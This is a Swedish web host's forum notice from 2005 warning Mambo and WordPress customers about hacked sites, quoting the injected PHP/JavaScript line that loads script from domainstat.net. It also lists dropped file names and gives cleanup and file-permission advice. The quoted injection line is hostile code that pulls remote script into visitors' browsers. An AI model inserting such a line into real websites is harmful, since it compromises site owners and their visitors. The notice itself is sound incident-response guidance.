[Erik]

Vi har fått rapporter från några Mambo och Wordpress-användare om att en ny rad placerats i vissa php-filer.

Raden ser ut så här:

<script language='JavaScript' type='text/javascript'> src='http://domainstat.net/stat.php'></script>

Eller så här:

<? if (!defined('domainstat')) { define("domainstat", "ok");  echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php'></script>";}?>

Dessa rader har en hackare lagt till pga ett säkerhetshål för bla. Mambo-scriptet. Raden bidrar till att sidan inte vill ladda direkt, utan står och väntar.
Mappar med "777" som inställd mapprättighet kan också drabbas.

- Vi uppmanar alla som INTE drabbats av detta att omedelbart uppgradera sina Mambo-script eller andra script som Ni använder på Era konton.


- Ni som drabbats, försök använda ett "rensnings program" som kan rensa bort den oönskade raden. Ladda hem kopior på de drabbade filerna, och låt programmet ta bort "extra raden" och ladda upp de modifierade filerna igen till Ert konto.
Ett program som kan användas är: A.F.9

Fler script kan vara drabbade, (bla. Wordpress & Gallery) eftersom det just nu verkar vara många säkerhetshål som hittas - så var snälla och sök igenom Era konton efter ändringar eller om "Domainstat" vill ladda när Ni besöker Er hemsida.

Detta inlägg har redigerats av Erik: 09 december 2005 - 18:08

[Erik]

Jag postar här igen, eftersom vi nu fått 3 rapporter från kunder (med script) som har drabbats av detta igen - ingen sida försöker dock laddas eftersom vi ju numera har spärrat den funktionen - men filer har redigeras - i en del har kod raderats på de sista raderna vilket gör att ett felmeddelande visas som tex.

Parse error: parse error, unexpected T_STRING in
/home/dittkontonamn/public_html/script/index.php on line 110

Även filer med namnen "base.php" , "date.php" , "system.php" , "time.php" , "date.php" , "report.php" , "include.php" , "includes.php" , "configs.php" , "messages.php" , "guest.php" , "create.php" , "base.php" , "download.php" , "remote.php" , "package.php" , "links.php" , "tests.php" , "finfo.php" ,"contacts.php" , "common.php" , "commands.php" , "options.php" , "layout.php" , "properties.php"

(alla med samma ändringsdatum) samt .htaccess filer har skickats upp i mappar som har CHKMOD 777.
I mappar som normalt ej ska ha någon .htaccess fil eller php-filer, såsom album/bildmappar.
OBS! Tänk på att filnamnen kan användas av scripten och därför eventuellt inte vara hackarens! Så ta ej bort filerna utan att vara säker på att de inte hör hemma där.

Att detta kan ske beror på att mapparna hade (rättigheterna) CHMOD "777" vilket ger "alla i hela världen" rättigheter till mappen. Det är ju tyvärr så att script som ska skriva i mappar kräver att det är satt till 777, men det är alltså en säkerhetsrisk.
"755" för mappar och "644" för filer är annars det som är standard.

Vi ber Er att maila oss om Ni får fel på Era script och inte själva kan installera om det eller har backup, så får vi gemensamt titta på en lösning.